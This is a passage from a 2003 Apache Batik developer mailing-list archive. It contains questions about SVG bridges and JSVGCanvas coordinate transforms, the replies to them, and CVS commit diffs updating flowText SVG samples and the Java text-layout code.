e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Feb 17 17:43:21 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26800 invoked by uid 500); 17 Feb 2003 17:43:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26735 invoked from network); 17 Feb 2003 17:43:20 -0000 Subject: getting Bridge from SVGOM Element From: Felix Breuer <[email protected]> To: Batik Dev List <[email protected]> Content-Type: text/plain Organization: Message-Id: <1045503779.1648.7.camel@tapir> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.0- Date: 17 Feb 2003 18:42:59 +0100 Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hello! How can you get the associated Bridge from within a SVGOM element? I would like to help and need to know this, before I can start implementing the missing methods. The only possibility I saw was doing SVGTextElementBridge bridge = (SVGTextElementBridge) this.svgContext from within a SVGOMTextContentElement, but is this correct? Thanks for your reply, Felix -- Felix Breuer <[email protected]> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Feb 18 07:39:55 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35011 invoked by uid 500); 18 Feb 2003 07:39:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35000 invoked from network); 18 Feb 2003 07:39:54 -0000 X-Authentication-Warning: crozet.ago.fr: Host mehetia.ago.fr [161.129.204.104] claimed to be ago.fr Message-ID: <[email protected]> Date: Tue, 18 Feb 2003 08:44:19 +0100 From: Gerard BUNEL <[email protected]> X-Mailer: Mozilla 4.75 [fr] (WinNT; U) X-Accept-Language: fr MIME-Version: 1.0 To: [email protected] Subject: Drawing in a JSVGCanvas Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Scanned: by AMaViS perl-11 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hello, I already posted this mail in batik-users but this one is probably a best place. I'm using JSVGCanvas do display a Map. I've to dynamically draw points on this map. For my first test, I've overloaded the paint(Graphics g) method to do this job. The code for this is the following: public void paint ( Graphics g) { super.paint(g); AffineTransform at = new AffineTransform( getRenderingTransform()); if (at == null) return; SVGOMRectElement elem = (SVGOMRectElement)getSVGDocument().getElementById("water"); SVGMatrix matrix =elem.getCTM(); AffineTransform transform = new AffineTransform( matrix.getA(), matrix.getB(), matrix.getC(), matrix.getD(), matrix.getE(), matrix.getF()); transform.preConcatenate(at); g.setColor(Color.black); //((Graphics2D)g).setTransform( new AffineTransform()); paintPoint(g, 1, -5.0f, 63.0f, transform); paintPoint(g, 2, -5.0f, 57.5f, transform); paintPoint(g, 3, -5.0f, 52.0f, transform); paintPoint(g, 4, 12.0f, 52.0f, transform); paintPoint(g, 5, 12.0f, 57.5f, transform); paintPoint(g, 6, 12.0f, 63.0f, transform); /* // inscription des différentes position des structures for (int i=0; i<structsSize(); i++) { Structure f = structsAt(i); paintPoint( g, (i+1), f.getLon(), f.getLat(), transform); } */ } public void paintPoint ( Graphics g, int a_Index, float a_Lon, float a_Lat, AffineTransform a_Transform) { // inscription des différentes position des structures try { Point2D ini = new Point2D.Float(a_Lon, a_Lat); Point2D p2d = a_Transform.transform( ini, null); g.drawRect((int)p2d.getX() - 2, (int)p2d.getY() - 2, 4, 4); g.drawString(String.valueOf(a_Index), (int)p2d.getX()+9, (int)p2d.getY()+11); } catch (Exception e) { e.printStackTrace(); } } The result is quite strange! As you can see I try to draw the four corners of my map. The two upper corner are drawn correctly. But the to lower are not and seem to be place two times lower than they should. Am I right using the getRenderingTransform() method ? Does anyone have a idea of what happens ? Gerard -- [email protected] - Atlantide - http://www.ago.fr/atlantide/ Technopole Brest Iroise BP 80802 - 29608 Brest cedex - France - Tel. : +1-623-992-4185 - Fax. : +1-623-992-4185 - e-mail: [email protected] Centre Affaires Oberthur - 74D, rue de Paris - 35700 Rennes - France Tel. : +1-623-992-4185 - Fax : +1-623-992-4185 - e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Feb 19 02:40:53 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31946 invoked by uid 500); 19 Feb 2003 02:40:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31933 invoked by uid 500); 19 Feb 2003 02:40:52 -0000 Delivered-To: [email protected] Date: 19 Feb 2003 02:40:51 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-batik/samples/tests/spec/scripting/textcontent - New directory X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N deweese 2003/02/18 18:40:51 xml-batik/samples/tests/spec/scripting/textcontent - New directory --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Feb 19 02:57:04 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43983 invoked by uid 500); 19 Feb 2003 02:57:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43972 invoked from network); 19 Feb 2003 02:57:03 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Tue, 18 Feb 2003 21:57:09 -0500 To: [email protected] Subject: CVS Commit [Message to large] X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N deweese 2003/02/18 18:50:58 Modified: samples/tests/spec/fonts fontAltGlyph2.svg sources/org/apache/batik/bridge SVGTextElementBridge.java sources/org/apache/batik/dom/svg SVGOMTextContentElement.java sources/org/apache/batik/ext/awt/image/spi JPEGRegistryEntry.java sources/org/apache/batik/gvt/font SVGGVTGlyphVector.java sources/org/apache/batik/gvt/text GlyphLayout.java TextSpanLayout.java test-resources/org/apache/batik/test regard.xml Added: samples/tests/spec/fonts fontAltGlyph3.svg samples/tests/spec/scripting/textcontent missing-glpyh.svg numberOfChars.svg sources/org/apache/batik/dom/svg SVGTextContent.java SVGTextContentSupport.java test-resources/org/apache/batik/test/svg getCharacterPosition.js getCharacterRotation.js getComputedTextLength.js getExtentOfChar.js test-sources/org/apache/batik/test/svg SVGTextContentRenderingAccuracyTest.java Log: 1) Initial version of TextContentElement interfaces. (Thanks Nicolas Socheleau) Take a look at the pretty cool test 'numberOfChar.svg'. 2) Fixes for MissingGlyph rendering (new test) 3) Fixes for text section and altGlyph (and new altGlyph test). --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Feb 19 10:58:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85524 invoked by uid 500); 19 Feb 2003 10:58:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 85508 invoked from network); 19 Feb 2003 10:58:11 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Wed, 19 Feb 2003 05:58:21 -0500 To: [email protected] Subject: RE: Drawing in a JSVGCanvas In-Reply-To: <[email protected]> References: <[email protected]> X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N >>>>> "GB" == Gerard BUNEL <[email protected]> writes: GB> I already posted this mail in batik-users but this one is GB> probably a best place. GB> I'm using JSVGCanvas do display a Map. I've to dynamically draw GB> points on this map. For my first test, I've overloaded the GB> paint(Graphics g) method to do this job. The code for this is the GB> following: So my guess is that you have some of the AffineTransform handling wrong (I would need to know a lot more about the context to know exactly where - for example it is possible that at the end of super.paint(g) the rendering transform has already been applied). The simpliest thing to do is just print out the various transforms to figure out what is going on (g2d.getTransform() will tell you the transform already in the Graphics2D). If you aren't really used to working with them this is the only way you will get anywhere. I am really used to working with them and except for really simple cases I have to stop and think for a while before I can just write the code. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Feb 20 08:24:19 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87644 invoked by uid 500); 20 Feb 2003 08:24:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87626 invoked from network); 20 Feb 2003 08:24:17 -0000 X-Authentication-Warning: crozet.ago.fr: Host mehetia.ago.fr [161.129.204.104] claimed to be ago.fr Message-ID: <[email protected]> Date: Thu, 20 Feb 2003 09:28:35 +0100 From: Gerard BUNEL <[email protected]> X-Mailer: Mozilla 4.75 [fr] (WinNT; U) X-Accept-Language: fr MIME-Version: 1.0 To: [email protected] Subject: Re: Drawing in a JSVGCanvas References: <[email protected]> <[email protected]> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Scanned: by AMaViS perl-11 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N In fact the problem came from the SVG file itself. the viewBox attribute didn't correspond to other information provided in the file. So all coordinates calculations was wrong (in my sense). I've found the problem by trying many changes in the SVG file. My problem is that I don't really understand all informations in that file. I should probably read more about SVG. Is there some interesting books or links you should recommend ? Thanks anyway. Gerard Thomas E Deweese a écrit : > >>>>> "GB" == Gerard BUNEL <[email protected]> writes: > > GB> I already posted this mail in batik-users but this one is > GB> probably a best place. > > GB> I'm using JSVGCanvas do display a Map. I've to dynamically draw > GB> points on this map. For my first test, I've overloaded the > GB> paint(Graphics g) method to do this job. The code for this is the > GB> following: > > So my guess is that you have some of the AffineTransform handling > wrong (I would need to know a lot more about the context to know > exactly where - for example it is possible that at the end of > super.paint(g) the rendering transform has already been applied). The > simpliest thing to do is just print out the various transforms to > figure out what is going on (g2d.getTransform() will tell you the > transform already in the Graphics2D). > > If you aren't really used to working with them this is the only > way you will get anywhere. I am really used to working with them and > except for really simple cases I have to stop and think for a while > before I can just write the code. > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] -- [email protected] - Atlantide - http://www.ago.fr/atlantide/ Technopole Brest Iroise BP 80802 - 29608 Brest cedex - France - Tel. : +1-623-992-4185 - Fax. : +1-623-992-4185 - e-mail: [email protected] Centre Affaires Oberthur - 74D, rue de Paris - 35700 Rennes - France Tel. : +1-623-992-4185 - Fax : +1-623-992-4185 - e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Feb 20 11:15:48 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95866 invoked by uid 500); 20 Feb 2003 11:15:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95854 invoked by uid 500); 20 Feb 2003 11:15:47 -0000 Delivered-To: [email protected] Date: 20 Feb 2003 11:15:48 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-batik/sources/org/apache/batik/gvt/text RegionInfo.java GlyphIterator.java GlyphLayout.java LineInfo.java MarginInfo.java X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N deweese 2003/02/20 03:15:47 Modified: samples/extensions flowText.svg sources/org/apache/batik/extension/svg BatikExtConstants.java SVGFlowTextElementBridge.java sources/org/apache/batik/gvt/text GlyphIterator.java GlyphLayout.java LineInfo.java MarginInfo.java Added: samples/extensions flowTextAlign.svg sources/org/apache/batik/gvt/text RegionInfo.java Log: Flow text syntax is now brought up to date with SVG Drafts (see examples) Flow text now supports vertical-align attribute on flowRegion elements. New (boring) test for vertical align property. Revision Changes Path 1.8 +15 -15 xml-batik/samples/extensions/flowText.svg Index: flowText.svg =================================================================== RCS file: /home/cvs/xml-batik/samples/extensions/flowText.svg,v retrieving revision 1.7 retrieving revision 1.8 diff -u -r1.7 -r1.8 --- flowText.svg 15 Nov 2002 15:46:50 -0000 1.7 +++ flowText.svg 20 Feb 2003 11:15:46 -0000 1.8 @@ -34,20 +34,20 @@ <line x1="243" y1="70" x2="243" y2="490" stroke="grey" fill="none"/> <line x1="423" y1="70" x2="423" y2="490" stroke="grey" fill="none"/> - <batik:flowText xmlns:batik="http://xml.apache.org/batik/ext" - font-size="20" xml:space="preserve"> - <batik:flowLayout> - <batik:flowRegion x="17" y="80" width="200" height="400"/> - <batik:flowRegion x="233" y="80" width="200" height="400"/> - </batik:flowLayout> + <flowText font-size="20" xml:space="preserve" + xmlns="http://xml.apache.org/batik/ext"> + <flowRegion> + <rect x="17" y="80" width="200" height="400"/> + <rect x="233" y="80" width="200" height="400"/> + </flowRegion> - <batik:flowDiv> - <batik:flowPara first-line-left-margin="20" bottom-margin="10" >This is an <batik:flowSpan font-size="40" fill="crimson">ex&#x00AD;ample</batik:flowSpan> of a very long string that is split &#x200D;across multi&#x00AD;ple lines via text wrap&#x0AD;ping.</batik:flowPara> - <batik:flowPara justification="middle" top-margin="10" left-margin="10" right-margin="10" bottom-margin="10"><batik:flowLine>Now check if text wrapping handles a number of tricky</batik:flowLine> situations: averylongrunonwordthatspansmultiplelines<batik:flowSpan font-weight="bold">with<batik:flowSpan fill="crimson">embedded</batik:flowSpan>span</batik:flowSpan>elements &amp; <batik:flowSpan fill="green" dy="-.3em" font-size="80%">super</batik:flowSpan><batik:flowSpan dy=".3em"> or </batik:flowSpan><batik:flowSpan fill="darkgreen" dy=".3em" font-size="80%">sub</batik:flowSpan><batik:flowSpan dy="-.3em"> scripts.</batik:flowSpan></batik:flowPara> - <batik:flowPara top-margin="10" justification="end">Now we are just <batik:flowSpan font-size="30" fill="blue">about</batik:flowSpan> to go to the next flow rect <batik:flowSpan font-size="10">(note if the 'about' were included on the last line of the previous flow rect the line would not have fit and the whole line would have moved here).</batik:flowSpan></batik:flowPara> - <batik:flowPara margin="10" justification="full"> I'll keep going because I want to make sure that it properly stops when it hits the end of all of the the flow regions defined. Also the last line includes text in a larger font size so it will not fit. Thus the end of this sentence will be cut off because the line size gets <batik:flowSpan font-size="35">tall</batik:flowSpan>er</batik:flowPara> - </batik:flowDiv> - </batik:flowText> + <flowDiv> + <flowPara indent="20" bottom-margin="10" >This is an <flowSpan font-size="40" fill="crimson">ex&#x00AD;ample</flowSpan> of a very long string that is split &#x200D;across multi&#x00AD;ple lines via text wrap&#x0AD;ping.</flowPara> + <flowPara justification="middle" top-margin="10" left-margin="10" right-margin="10" bottom-margin="10"><flowLine>Now check if text wrapping handles a number of tricky</flowLine> situations: averylongrunonwordthatspansmultiplelines<flowSpan font-weight="bold">with<flowSpan fill="crimson">embedded</flowSpan>span</flowSpan>elements &amp; <flowSpan fill="green" dy="-.3em" font-size="80%">super</flowSpan><flowSpan dy=".3em"> or </flowSpan><flowSpan fill="darkgreen" dy=".3em" font-size="80%">sub</flowSpan><flowSpan dy="-.3em"> scripts.</flowSpan></flowPara> + <flowPara top-margin="10" justification="end">Now we are just <flowSpan font-size="30" fill="blue">about</flowSpan> to go to the next flow rect <flowSpan font-size="10">(note if the 'about' were included on the last line of the previous flow rect the line would not have fit and the whole line would have moved here).</flowSpan></flowPara> + <flowPara margin="10" justification="full"> I'll keep going because I want to make sure that it properly stops when it hits the end of all of the the flow regions defined. Also the last line includes text in a larger font size so it will not fit. Thus the end of this sentence will be cut off because the line size gets <flowSpan font-size="35">tall</flowSpan>er</flowPara> + </flowDiv> + </flowText> </g> <!-- ============================================================= --> 1.1 xml-batik/samples/extensions/flowTextAlign.svg Index: flowTextAlign.svg =================================================================== <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"> <!-- ====================================================================== --> <!-- Copyright (C) The Apache Software Foundation. All rights reserved. --> <!-- --> <!-- This software is published under the terms of the Apache Software --> <!-- License version 1.1, a copy of which has been included with this --> <!-- distribution in the LICENSE file. --> <!-- ====================================================================== --> <!-- ====================================================================== --> <!-- Tests various text on a path --> <!-- --> <!-- @author [email protected] --> <!-- @version $Id: flowTextAlign.svg,v 1.1 2003/02/20 11:15:46 deweese Exp $ --> <!-- ====================================================================== --> <?xml-stylesheet type="text/css" href="extension.css" ?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="body" width="450" height="500" viewBox="0 0 450 500"> <title>Test of Text vertical-align.</title> <g id="content" > <text class="title" x="50%" y="40">Test of Text vertical-align</text> <g font-family="serif" transform="translate(0,60)"> <g fill="rgb(220,220,255)"> <rect x="12.5" y="0" width="125" height="36"/> <rect x="162.5" y="0" width="125" height="36"/> <rect x="312.5" y="0" width="125" height="36"/> </g> <flowText xmlns="http://xml.apache.org/batik/ext" font-size="24" xml:space="preserve"> <flowRegion vertical-align="top"> <rect x="12.5" y="0" width="125" height="36"/> </flowRegion> <flowRegion vertical-align="middle"> <rect x="162.5" y="0" width="125" height="36"/> </flowRegion> <flowRegion vertical-align="bottom"> <rect x="312.5" y="0" width="125" height="36"/> </flowRegion> <flowDiv> <flowRegionBreak justification="middle" >Try top</flowRegionBreak> <flowRegionBreak justification="middle" >Try middle</flowRegionBreak> <flowRegionBreak justification="middle" >Try bottom</flowRegionBreak> </flowDiv> </flowText> </g> <g font-family="serif" transform="translate(0,120)" > <g fill="rgb(220,220,255)"> <rect x="12.5" y="0" width="125" height="36"/> <rect x="12.5" y="40" width="125" height="36"/> <rect x="162.5" y="0" width="125" height="36"/> <rect x="162.5" y="40" width="125" height="36"/> <rect x="312.5" y="0" width="125" height="36"/> <rect x="312.5" y="40" width="125" height="36"/> </g> <flowText xmlns="http://xml.apache.org/batik/ext" font-size="24" xml:space="preserve"> <flowRegion vertical-align="top"> <rect x="12.5" y="0" width="125" height="36"/> <rect x="12.5" y="40" width="125" height="36"/> </flowRegion> <flowRegion vertical-align="middle"> <rect x="162.5" y="0" width="125" height="36"/> <rect x="162.5" y="40" width="125" height="36"/> </flowRegion> <flowRegion vertical-align="bottom"> <rect x="312.5" y="0" width="125" height="36"/> <rect x="312.5" y="40" width="125" height="36"/> </flowRegion> <flowDiv> <flowRegionBreak justification="middle" >Try top two lines</flowRegionBreak> <flowRegionBreak justification="middle" >Middle two lines</flowRegionBreak> <flowRegionBreak justification="middle" >Bottom two lines</flowRegionBreak> </flowDiv> </flowText> </g> <g font-family="serif" transform="translate(0,220)" > <g fill="rgb(220,220,255)"> <rect x="12.5" y="0" width="125" height="72"/> <rect x="162.5" y="0" width="125" height="72"/> <rect x="312.5" y="0" width="125" height="72"/> </g> <flowText xmlns="http://xml.apache.org/batik/ext" font-size="24" xml:space="preserve"> <flowRegion vertical-align="top"> <rect x="12.5" y="0" width="125" height="72"/> </flowRegion> <flowRegion vertical-align="middle"> <rect x="162.5" y="0" width="125" height="72"/> </flowRegion> <flowRegion vertical-align="bottom"> <rect x="312.5" y="0" width="125" height="72"/> </flowRegion> <flowDiv> <flowRegionBreak justification="middle" >Try top two lines</flowRegionBreak> <flowRegionBreak justification="middle" >Middle two lines</flowRegionBreak> <flowRegionBreak justification="middle" >Bottom two lines</flowRegionBreak> </flowDiv> </flowText> </g> <g font-family="serif" transform="translate(0,320)" > <g fill="rgb(220,220,255)"> <rect x="12.5" y="0" width="125" height="72"/> <rect x="162.5" y="0" width="125" height="72"/> <rect x="312.5" y="0" width="125" height="72"/> </g> <flowText xmlns="http://xml.apache.org/batik/ext" font-size="24" xml:space="preserve"> <flowRegion vertical-align="top"> <rect x="12.5" y="0" width="125" height="72"/> </flowRegion> <flowRegion vertical-align="middle"> <rect x="162.5" y="0" width="125" height="72"/> </flowRegion> <flowRegion vertical-align="bottom"> <rect x="312.5" y="0" width="125" height="72"/> </flowRegion> <flowDiv> <flowPara justification="middle" >Try top</flowPara> <flowRegionBreak justification="middle" >two lines</flowRegionBreak> <flowPara justification="middle" >Middle</flowPara> <flowRegionBreak justification="middle" >two lines</flowRegionBreak> <flowPara justification="middle" >Bottom</flowPara> <flowRegionBreak justification="middle" >two lines</flowRegionBreak> </flowDiv> </flowText> </g> </g> <!-- ============================================================= --> <!-- Batik sample mark --> <!-- ============================================================= --> <use xlink:href="../batikLogo.svg#Batik_Tag_Box" /> </svg> 1.15 +70 -51 xml-batik/sources/org/apache/batik/extension/svg/BatikExtConstants.java Index: BatikExtConstants.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/extension/svg/BatikExtConstants.java,v retrieving revision 1.14 retrieving revision 1.15 diff -u -r1.14 -r1.15 --- BatikExtConstants.java 25 Nov 2002 16:14:15 -0000 1.14 +++ BatikExtConstants.java 20 Feb 2003 11:15:47 -0000 1.15 @@ -23,17 +23,59 @@ public static final String BATIK_EXT_STAR_TAG = "star"; - /** Tag name for Batik's flowText extension (SVG 1.1). */ + /** Tag name for Batik's flowText extension (SVG 1.2). */ public static final String BATIK_EXT_FLOW_TEXT_TAG = "flowText"; - /** Tag name for Batik's flowText extension Region element (SVG 1.1). */ - public static final String BATIK_EXT_FLOW_LAYOUT_TAG = - "flowLayout"; - /** Tag name for Batik's flowText extension Region element (SVG 1.1). */ + /** Tag name for Batik's flowText extension Region element (SVG 1.2). */ public static final String BATIK_EXT_FLOW_REGION_TAG = "flowRegion"; + /** Tag name for Batik's flowText extension Region element (SVG 1.2). */ + public static final String BATIK_EXT_FLOW_REGION_EXCLUDE_TAG = + "flowRegionExclude"; + + /** Tag name for Batik's flowText extension div element SVG 1.2). */ + public static final String BATIK_EXT_FLOW_DIV_TAG = + "flowDiv"; + + /** Tag name for Batik's flowText extension p element SVG 1.2). */ + public static final String BATIK_EXT_FLOW_PARA_TAG = + "flowPara"; + + /** Tag name for Batik's flowText extension flow Region break + * element SVG 1.2). */ + public static final String BATIK_EXT_FLOW_REGION_BREAK_TAG = + "flowRegionBreak"; + + /** Tag name for Batik's flowText extension line element SVG 1.2). */ + public static final String BATIK_EXT_FLOW_LINE_TAG = + "flowLine"; + + /** Tag name for Batik's flowText extension span element SVG 1.2). */ + public static final String BATIK_EXT_FLOW_SPAN_TAG = + "flowSpan"; + + /** Tag name for Batik's solid color extension (SVG 1.2). */ + public static final String BATIK_EXT_SOLID_COLOR_TAG = + "solidColor"; + + /** Tag name for Batik's color switch extension. */ + public static final String BATIK_EXT_COLOR_SWITCH_TAG = + "colorSwitch"; + + /** Tag name for Batik's histogram normalization extension. */ + public static final String BATIK_EXT_HISTOGRAM_NORMALIZATION_TAG = + "histogramNormalization"; + + /** Tag name for Batik's multiImage extension. */ + public static final String BATIK_EXT_MULTI_IMAGE_TAG = + "multiImage"; + + /** Tag name for Batik's subImage multiImage extension. */ + public static final String BATIK_EXT_SUB_IMAGE_TAG = + "subImage"; + /** Attribute name for dx attribute */ public static final String BATIK_EXT_DX_ATRIBUTE = "dx"; @@ -86,59 +128,36 @@ /** Attribute name for left-margin attribute */ public static final String BATIK_EXT_LEFT_MARGIN_ATTRIBUTE = "left-margin"; - /** Attribute name for first-line-left-margin attribute */ - public static final String BATIK_EXT_FIRST_LINE_LEFT_MARGIN_ATTRIBUTE = - "first-line-left-margin"; - /** Attribute name for first-line-right-margin attribute */ - public static final String BATIK_EXT_FIRST_LINE_RIGHT_MARGIN_ATTRIBUTE = - "first-line-right-margin"; + /** Attribute name for indent attribute/property */ + public static final String BATIK_EXT_INDENT_ATTRIBUTE = + "indent"; /** Attribute name for justification */ public static final String BATIK_EXT_JUSTIFICATION_ATTRIBUTE = "justification"; + /** Value for justification to start of region */ + public static final String BATIK_EXT_JUSTIFICATION_START_VALUE = "start"; + /** Value for justification to middle of region */ + public static final String BATIK_EXT_JUSTIFICATION_MIDDLE_VALUE = "middle"; + /** Value for justification to end of region */ + public static final String BATIK_EXT_JUSTIFICATION_END_VALUE = "end"; + /** Value for justification to both edges of region */ + public static final String BATIK_EXT_JUSTIFICATION_FULL_VALUE = "full"; + + /** Attribute name for preformated data */ public static final String BATIK_EXT_PREFORMATTED_ATTRIBUTE = "preformatted"; - /** Tag name for Batik's flowText extension div element SVG 1.1). */ - public static final String BATIK_EXT_FLOW_DIV_TAG = - "flowDiv"; - - /** Tag name for Batik's flowText extension p element SVG 1.1). */ - public static final String BATIK_EXT_FLOW_PARA_TAG = - "flowPara"; - - /** Tag name for Batik's flowText extension flow Region break - * element SVG 1.1). */ - public static final String BATIK_EXT_FLOW_REGION_BREAK_TAG = - "flowRegionBreak"; - - /** Tag name for Batik's flowText extension line element SVG 1.1). */ - public static final String BATIK_EXT_FLOW_LINE_TAG = - "flowLine"; - - /** Tag name for Batik's flowText extension span element SVG 1.1). */ - public static final String BATIK_EXT_FLOW_SPAN_TAG = - "flowSpan"; - - /** Tag name for Batik's solid color extension (SVG 1.1). */ - public static final String BATIK_EXT_SOLID_COLOR_TAG = - "solidColor"; - - /** Tag name for Batik's color switch extension. */ - public static final String BATIK_EXT_COLOR_SWITCH_TAG = - "colorSwitch"; - - /** Tag name for Batik's histogram normalization extension. */ - public static final String BATIK_EXT_HISTOGRAM_NORMALIZATION_TAG = - "histogramNormalization"; - - /** Tag name for Batik's multiImage extension. */ - public static final String BATIK_EXT_MULTI_IMAGE_TAG = - "multiImage"; - - /** Tag name for Batik's subImage multiImage extension. */ - public static final String BATIK_EXT_SUB_IMAGE_TAG = - "subImage"; + /** Attribute name for preformated data */ + public static final String BATIK_EXT_VERTICAL_ALIGN_ATTRIBUTE = + "vertical-align"; + + /** Value for vertical-align to top of region */ + public static final String BATIK_EXT_ALIGN_TOP_VALUE = "top"; + /** Value for vertical-align to middle of region */ + public static final String BATIK_EXT_ALIGN_MIDDLE_VALUE = "middle"; + /** Value for vertical-align to bottom of region */ + public static final String BATIK_EXT_ALIGN_BOTTOM_VALUE = "bottom"; /** Attribute name for sides attribute */ public static final String BATIK_EXT_SIDES_ATTRIBUTE = 1.8 +62 -46 xml-batik/sources/org/apache/batik/extension/svg/SVGFlowTextElementBridge.java Index: SVGFlowTextElementBridge.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/extension/svg/SVGFlowTextElementBridge.java,v retrieving revision 1.7 retrieving revision 1.8 diff -u -r1.7 -r1.8 --- SVGFlowTextElementBridge.java 15 Nov 2002 15:46:50 -0000 1.7 +++ SVGFlowTextElementBridge.java 20 Feb 2003 11:15:47 -0000 1.8 @@ -39,6 +39,9 @@ import org.apache.batik.gvt.text.GVTAttributedCharacterIterator; import org.apache.batik.gvt.text.MarginInfo; import org.apache.batik.gvt.text.TextPath; +import org.apache.batik.gvt.text.RegionInfo; + +import org.apache.batik.util.SVGConstants; /** * Bridge class for the &lt;flowText> element. @@ -338,47 +341,71 @@ } protected List getRegions(BridgeContext ctx, Element element) { + List ret = new LinkedList(); for (Node n = element.getFirstChild(); n != null; n = n.getNextSibling()) { if (n.getNodeType() != Node.ELEMENT_NODE) continue; if (n.getNamespaceURI() != getNamespaceURI()) continue; + Element e = (Element)n; - String ln = n.getLocalName(); - if (ln.equals(BATIK_EXT_FLOW_LAYOUT_TAG)) { - return gatherRects(ctx, e); + String ln = e.getLocalName(); + if (BATIK_EXT_FLOW_REGION_TAG.equals(ln)) { + // our default alignment is to the top of the flow rect. + float verticalAlignment = 0.0f; + String verticalAlignmentAttribute + = e.getAttribute(BATIK_EXT_VERTICAL_ALIGN_ATTRIBUTE); + + if ((verticalAlignmentAttribute != null) && + (verticalAlignmentAttribute.length() > 0)) { + if (BATIK_EXT_ALIGN_TOP_VALUE.equals + (verticalAlignmentAttribute)) { + verticalAlignment = 0.0f; + } else if (BATIK_EXT_ALIGN_MIDDLE_VALUE.equals + (verticalAlignmentAttribute)) { + verticalAlignment = 0.5f; + } else if (BATIK_EXT_ALIGN_BOTTOM_VALUE.equals + (verticalAlignmentAttribute)) { + verticalAlignment = 1.0f; + } + } + + gatherRegionInfo(ctx, e, verticalAlignment, ret); } } - return null; + + return ret; } - protected List gatherRects(BridgeContext ctx, Element rgn) { - List ret = new LinkedList(); + protected void gatherRegionInfo(BridgeContext ctx, Element rgn, + float verticalAlign, List regions) { + for (Node n = rgn.getFirstChild(); n != 